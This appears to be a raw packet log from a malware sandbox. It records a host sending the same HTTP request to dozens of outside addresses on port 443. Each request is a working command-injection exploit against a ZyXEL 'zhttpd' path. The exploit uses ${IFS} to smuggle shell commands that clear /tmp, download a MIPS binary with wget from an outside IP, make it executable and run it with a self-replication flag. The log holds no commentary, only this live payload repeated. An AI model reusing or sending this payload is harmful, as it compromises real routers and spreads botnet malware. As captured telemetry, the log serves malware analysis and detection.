                                        Jan 14, 2024 16:18:43.420387983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3911192.168.2.135299620.194.91.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420403004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3912192.168.2.135940462.0.117.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420444965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3913192.168.2.1339750106.155.2.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420475006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3914192.168.2.13572865.20.177.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420515060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3915192.168.2.1335100119.127.154.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420578957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3916192.168.2.1354148169.15.251.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420620918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3917192.168.2.1349128102.95.94.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420631886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3918192.168.2.1346592117.206.94.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420675039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3919192.168.2.135168884.250.93.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420733929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3920192.168.2.1360594172.136.147.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420782089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3921192.168.2.1345736137.166.7.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420836926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3922192.168.2.135898872.119.31.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420855999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3923192.168.2.135098470.88.155.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420911074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3924192.168.2.1333796180.222.23.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420943975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3925192.168.2.133327089.41.127.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.420980930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3926192.168.2.134132294.133.35.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421020031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3927192.168.2.1350954129.4.151.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421061993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3928192.168.2.1353148126.181.206.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421098948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3929192.168.2.13457969.190.181.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421139002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3930192.168.2.1359562116.60.121.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421191931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3931192.168.2.1333966145.183.11.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421224117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3932192.168.2.134498042.124.36.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421250105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3933192.168.2.1342032120.140.115.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421278954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3934192.168.2.133926258.180.193.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421293020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3935192.168.2.1335748125.61.92.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421371937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3936192.168.2.134082666.237.109.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421399117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3937192.168.2.1338068178.57.131.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421423912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3938192.168.2.134445469.191.250.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421475887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3939192.168.2.135889495.22.62.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421516895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3940192.168.2.133468675.248.72.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421551943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3941192.168.2.134575467.215.23.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421607018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3942192.168.2.1355032150.183.216.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421647072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3943192.168.2.134177276.38.219.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421673059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3944192.168.2.1348396201.101.214.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421678066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3945192.168.2.133284272.16.85.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421721935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3946192.168.2.1335676138.53.237.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421780109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3947192.168.2.134633298.215.211.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421802998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3948192.168.2.133540248.146.86.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421844006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3949192.168.2.1353466219.146.87.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421904087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3950192.168.2.133759269.124.172.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421926975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3951192.168.2.1335936213.251.22.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.421988964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3952192.168.2.1344188137.42.220.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422045946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3953192.168.2.1356626176.0.103.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422085047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3954192.168.2.135701660.82.168.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422137022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3955192.168.2.1334018183.39.2.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422182083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3956192.168.2.135872068.11.59.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422219992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3957192.168.2.1348578104.252.72.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422275066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3958192.168.2.1344734223.220.31.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422308922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3959192.168.2.1333228136.125.151.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422343969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3960192.168.2.1354142177.131.165.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422374010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3961192.168.2.133359260.138.192.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422419071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3962192.168.2.1339194116.41.222.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422471046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3963192.168.2.1335000218.22.209.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422504902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3964192.168.2.135576861.249.185.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422557116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3965192.168.2.1344618166.46.62.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422583103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3966192.168.2.1356650173.185.68.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422629118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3967192.168.2.135986297.121.29.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422662020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3968192.168.2.1353010172.253.58.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422707081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3969192.168.2.134076883.26.228.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422738075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3970192.168.2.1352088213.109.199.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422784090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3971192.168.2.136022899.174.103.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422813892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3972192.168.2.1348072175.213.13.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:43.422874928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3973192.168.2.1359680195.173.68.196443
                                        TimestampBytes transferredDirectionData
